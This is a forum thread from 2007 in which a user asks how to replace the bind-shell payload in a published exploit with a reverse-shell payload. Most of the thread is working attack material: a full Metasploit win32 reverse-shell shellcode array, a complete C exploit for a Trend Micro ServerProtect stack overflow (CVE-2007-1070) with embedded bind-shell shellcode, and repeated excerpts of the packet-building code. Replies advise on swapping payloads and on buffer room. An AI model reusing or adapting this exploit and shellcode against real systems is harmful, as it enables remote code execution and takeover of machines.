add a shellcode to a sourcecode

slipparse · Post by **slipparse** » 11 Sep 2007, 13:15

I know this is a stupid question but I'll ask anyway

I would like to add a reverse shell in a sourcecode that only includes a bind shell. Suppose the sourcecode is written in c. I know I can get a general reverse shell from sites like metasploit so I'll take this one.

Code: Select all

/* win32_reverse -  EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
char shellcode[] =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x61\x88\x6f\x83\xeb\xfc\xe2\xf4\xc3\x0b\x63\x22\xd7\x98\x77\x90"
"\xc0\x01\x03\x03\x1b\x45\x03\x2a\x03\xea\xf4\x6a\x47\x60\x67\xe4"
"\x70\x79\x03\x30\x1f\x60\x63\x26\xb4\x55\x03\x6e\xd1\x50\x48\xf6"
"\x93\xe5\x48\x1b\x38\xa0\x42\x62\x3e\xa3\x63\x9b\x04\x35\xac\x47"
"\x4a\x84\x03\x30\x1b\x60\x63\x09\xb4\x6d\xc3\xe4\x60\x7d\x89\x84"
"\x3c\x4d\x03\xe6\x53\x45\x94\x0e\xfc\x50\x53\x0b\xb4\x22\xb8\xe4"
"\x7f\x6d\x03\x1f\x23\xcc\x03\x2f\x37\x3f\xe0\xe1\x71\x6f\x64\x3f"
"\xc0\xb7\xee\x3c\x59\x09\xbb\x5d\x57\x16\xfb\x5d\x60\x35\x77\xbf"
"\x57\xaa\x65\x93\x04\x31\x77\xb9\x60\xe8\x6d\x09\xbe\x8c\x80\x6d"
"\x6a\x0b\x8a\x90\xef\x09\x51\x66\xca\xcc\xdf\x90\xe9\x32\xdb\x3c"
"\x6c\x22\xdb\x2c\x6c\x9e\x58\x07\x35\x61\x88\x6c\x59\x09\x8c\x69"
"\x59\x32\x01\x8e\xaa\x09\x64\x96\x95\x01\xdf\x90\xe9\x0b\x98\x3e"
"\x6a\x9e\x58\x09\x55\x05\xee\x07\x5c\x0c\xe2\x3f\x66\x48\x44\xe6"
"\xd8\x0b\xcc\xe6\xdd\x50\x48\x9c\x95\xf4\x01\x92\xc1\x23\xa5\x91"
"\x7d\x4d\x05\x15\x07\xca\x23\xc4\x57\x13\x76\xdc\x29\x9e\xfd\x47"
"\xc0\xb7\xd3\x38\x6d\x30\xd9\x3e\x55\x60\xd9\x3e\x6a\x30\x77\xbf"
"\x57\xcc\x51\x6a\xf1\x32\x77\xb9\x55\x9e\x77\x58\xc0\xb1\xe0\x88"
"\x46\xa7\xf1\x90\x4a\x65\x77\xb9\xc0\x16\x74\x90\xef\x09\x78\xe5"
"\x3b\x3e\xdb\x90\xe9\x9e\x58\x6f";

so how do I insert all this in a full exploit code? Let's take f.e. a recent exploit Ive just found on millworm. I would be really gratefull if anybody could edit this code so'll notice the differences.

Code: Select all

/* 
 * Copyright (c) 2007 devcode
 *
 *
 *			^^ D E V C O D E ^^
 *
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 *
 *
 * Description:
 *    A boundary error within a function in eng50.dll can be
 *    exploited to cause a stack-based buffer overflow via a
 *    specially crafted RPC request to the SpntSvc.exe service.
 *
 * Hotfix/Patch:
 *    http://www.trendmicro.com/download/product.asp?productid=17
 *
 * Vulnerable systems:
 *    ServerProtect for Windows 5.58
 *    ServerProtect for EMC 5.58
 *    ServerProtect for Network Appliance Filer 5.61
 *    ServerProtect for Network Appliance Filer 5.62
 *
 * Tested on:
 * 	  Microsoft Windows 2000 SP4
 * 
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is 
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *	  <3 TippingPoint for technical details. Had this made few days after
 *    disclosure (few months back), was rlsd on r1918 about a week ago 
 *    and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
 *    I WAS THIS HOT DAYUM
 *
 *
 */
#include <iostream>
#include <windows.h>
 
#pragma comment( lib, "ws2_32.lib" )
 
/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
unsigned char uszDceBind[] =
	"\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
	"\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00" 
	"\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C" 
	"\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
	"\x2B\x10\x48\x60\x02\x00\x00\x00";
 
/* rpc_opnum_0 */
unsigned char uszDceCall[] =
	"\x05\x00\x00\x83\x10\x00\x00\x00\x08\x08\x00\x00\x01\x00\x00\x00"
	"\xE0\x07\x00\x00\x00\x00\x00\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11"
	"\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x04\x00\x03\x00\xD0\x07\x00\x00";
 
/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char uszShellcode[] =
	"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab"
	"\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2"
	"\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca"
	"\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56"
	"\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37"
	"\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe"
	"\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde"
	"\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04"
	"\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19"
	"\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8"
	"\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81"
	"\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba"
	"\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f"
	"\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d"
	"\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04"
	"\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb"
	"\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90"
	"\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96"
	"\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02"
	"\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85"
	"\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d"
	"\x7d\xe0\xa6\xd2\xab\x1f";
 
void usage( ) {
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
			"\t\t  (c) 2007 devcode | Compiled by Derka\n\n"
			"usage: tmicro.exe <ip> <port>\n");
}
 
int main( int argc, char **argv ) {
	WSADATA wsaData;
	SOCKET sConnect;
	SOCKADDR_IN sockAddr;
	char szRecvBuf[512];
	unsigned char uszPacket[2056];
	int nRet;
 
	if ( argc < 3 ) {
		usage( );
		return -1;
	}
 
	if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
		printf("[-] Unable to startup winsock\n");
		return -1;
	}
 
	sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
	if ( sConnect == INVALID_SOCKET ) {
		printf("[-] Invalid socket\n");
		return -1;
	}
 
	sockAddr.sin_family = AF_INET;
	sockAddr.sin_addr.s_addr = inet_addr( argv[1] );	
	sockAddr.sin_port = htons( atoi( argv[2] ) );
 
	printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
	nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot connect to server\n");
		closesocket( sConnect );
		return -1;
	}
 
	printf("[+] Sending DCE Bind packet...\n");
	nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
	if ( nRet  == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
	if ( nRet <= 0 ) {
		printf("[-] Recv failed\n");
		closesocket( sConnect );
		return -1;
	}
 
	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
 
	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;
}

// milw0rm.com [2007-09-06]

sorry for scrolling down with all these long source codes

shamir · Post by **shamir** » 11 Sep 2007, 13:37

wate my bad, its written in c sorry man.

Post by **computathug** » 11 Sep 2007, 15:23

*off topic* sorry to bump your post slipparse

shamir wrote:A shell code huh????

Can you please tell us all what this complete obsolete and purely only accountable as spam post is all about. This is seriously beyond a joke now and have commented on this before along with other members to which i get a reply in pm saying "only trying to be nice".

If you dont understand something then either start a new topic or wait till somebody else can reply who has an understanding of the question then read again and you might then understand the topic posted.

now can this get back on track to the original post

shamir · Post by **shamir** » 11 Sep 2007, 17:05

what I'm trying to say is, what is the meaning of the line of the code he wrote.

Post by **Gogeta70** » 12 Sep 2007, 00:03

Please keep the posts on topic, if you want to discuss something with computathug, shamir, then take it to a PM.

bubzuru · Post by **bubzuru** » 12 Sep 2007, 00:13

that exploit already has the
bindshell shellcode in it

and normally you can just change the
shellcode but not always because the
might not be enough room in the buffer
to store the shellcode

slipparse · Post by **slipparse** » 13 Sep 2007, 11:49

yeah I know this code includes a bind shell but I would like to change it to reverse. So all your saying is I only need to replace the code and if Im lucky (read the buffer overlow is big enough)I might get it working?

don't I need to change other bits of the code also to convert it to the options of a reverse shell?

Code: Select all

void usage( ) {
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
			"\t\t\t(c) 2007 devcode\n\n"
			"usage: tmicro.exe <ip> <port>\n");

.................

Code: Select all

	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
 
	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;
}

bubzuru · Post by **bubzuru** » 13 Sep 2007, 12:11

slipparse wrote:yeah I know this code includes a bind shell but I would like to change it to reverse. So all your saying is I only need to replace the code and if Im lucky (read the buffer overlow is big enough)I might get it working?

don't I need to change other bits of the code also to convert it to the options of a reverse shell?

Code: Select all

void usage( ) {
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
			"\t\t\t(c) 2007 devcode\n\n"
			"usage: tmicro.exe <ip> <port>\n");

.................

Code: Select all

	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );
	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );
 
	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}
 
	printf("[+] Check shell on port 4444 :)\n");	
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );	
	closesocket( sConnect );
	return 0;
}

i think you might have to edit a bit
ov the code

also there might not be enough room
for the shellcode i suggest you get the
program you want to exploit and olly debugger

http://www.ollydbg.de/odbg110.zip